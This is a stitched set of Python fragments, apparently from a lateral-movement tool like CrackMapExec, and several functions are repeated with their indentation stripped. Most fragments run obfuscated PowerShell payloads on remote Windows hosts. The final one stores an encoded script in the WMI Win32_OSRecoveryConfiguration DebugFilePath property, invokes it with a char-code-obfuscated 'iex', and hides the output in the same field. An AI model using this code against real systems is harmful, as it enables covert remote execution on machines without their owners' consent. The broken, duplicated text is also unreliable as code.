def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False):
if not payload and self.args.ps_execute:
payload = self.args.ps_execute
if not self.args.no_output: get_output = True
if os.path.isfile(payload):
with open(payload) as commands:
for c in commands:
self.execute(create_ps_command(c, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
else:
self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods)
return ''
def on_admin_login(self, context, connection):
command = 'Test-Connection {} -quiet -count 1'.format(self.host)
ps_command = create_ps_command(command)
output = connection.execute(ps_command, get_output=True)
if output:
output = output.strip()
if bool(output) is True:
context.log.success('Pinged successfully')
elif bool(output) is False:
context.log.error('Host unreachable')
def on_admin_login(self, context, connection):
command = 'Test-Connection {} -quiet -count 1'.format(self.host)
ps_command = create_ps_command(command)
output = connection.execute(ps_command, get_output=True)
if output:
output = output.strip()
if bool(output) is True:
context.log.success('Pinged successfully')
elif bool(output) is False:
context.log.error('Host unreachable')
def ps_execute(self,
payload=None,
get_output=False,
methods=None,
force_ps32=False,
dont_obfs=False):
if not payload and self.args.ps_execute:
payload = self.args.ps_execute
if not self.args.no_output: get_output = True
return self.execute(
create_ps_command(payload,
force_ps32=force_ps32,
dont_obfs=dont_obfs), get_output, methods)
def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False):
#print 'Filename: ' + sys._getframe(0).f_code.co_filename + ' Method: ' + sys._getframe(0).f_code.co_name
script_command = self.degen_ps_iex_cradle(payload)
encoded_script = ','.join(map(str,map(ord,self.module.ps_script)))
len_enc_script = len(encoded_script)
####### ^ remember to make it for all ps_scripts{1,2,...}. Some modules have more than one PS script.
self.backup_value = self.get_values(self.query('Select DebugFilePath From Win32_OSRecoveryConfiguration', self.namespace, printable=False))['DebugFilePath']
self.update(update_value=encoded_script)
decode_script_command = '''
$a = Get-WMIObject -Class Win32_OSRecoveryConfiguration; $a = [char[]][int[]]$a.DebugFilePath.Split(',') -Join ''; $a | .(-Join[char[]]@(105,101,120));$output = ({script_command} | Out-String).Trim(); $EncodedText = [Int[]][Char[]]$output -Join ','; $a = Get-WMIObject -Class Win32_OSRecoveryConfiguration; $a.DebugFilePath = $EncodedText; $a.Put()
'''.format(script_command=script_command)
#print 'Decode script command is : ' + decode_script_command
ps_comm = create_ps_command(decode_script_command, force_ps32=False, dont_obfs=False)
#print 'Executing : ' + ps_comm
self.execute(ps_comm)
#sys.stdout.write('Waiting a few seconds for output to be inserted in DebugFilePath ..')
while True:
exec_result = self.get_values(self.query('Select DebugFilePath From Win32_OSRecoveryConfiguration', self.namespace, printable=False))['DebugFilePath']
len_exec_result = len(exec_result)
time.sleep(1)
#sys.stdout.write('.')
if not len_exec_result == len_enc_script:
break
#print
#print 'Detected encoding : ' + cchardet.detect(exec_result)['encoding']
output = ''.join(map(chr,map(int,exec_result.strip().split(','))))
#print colored(output, 'yellow', attrs=['bold'])
#print 'Detected encoding2: ' + cchardet.detect(self.backup_value)['encoding']
#print 'Restoring initial value : ' + self.backup_value
self.update(update_value=self.backup_value)
context = self.module_logger(self.module)
self.send_fake_response(output, self.module, self.host, context)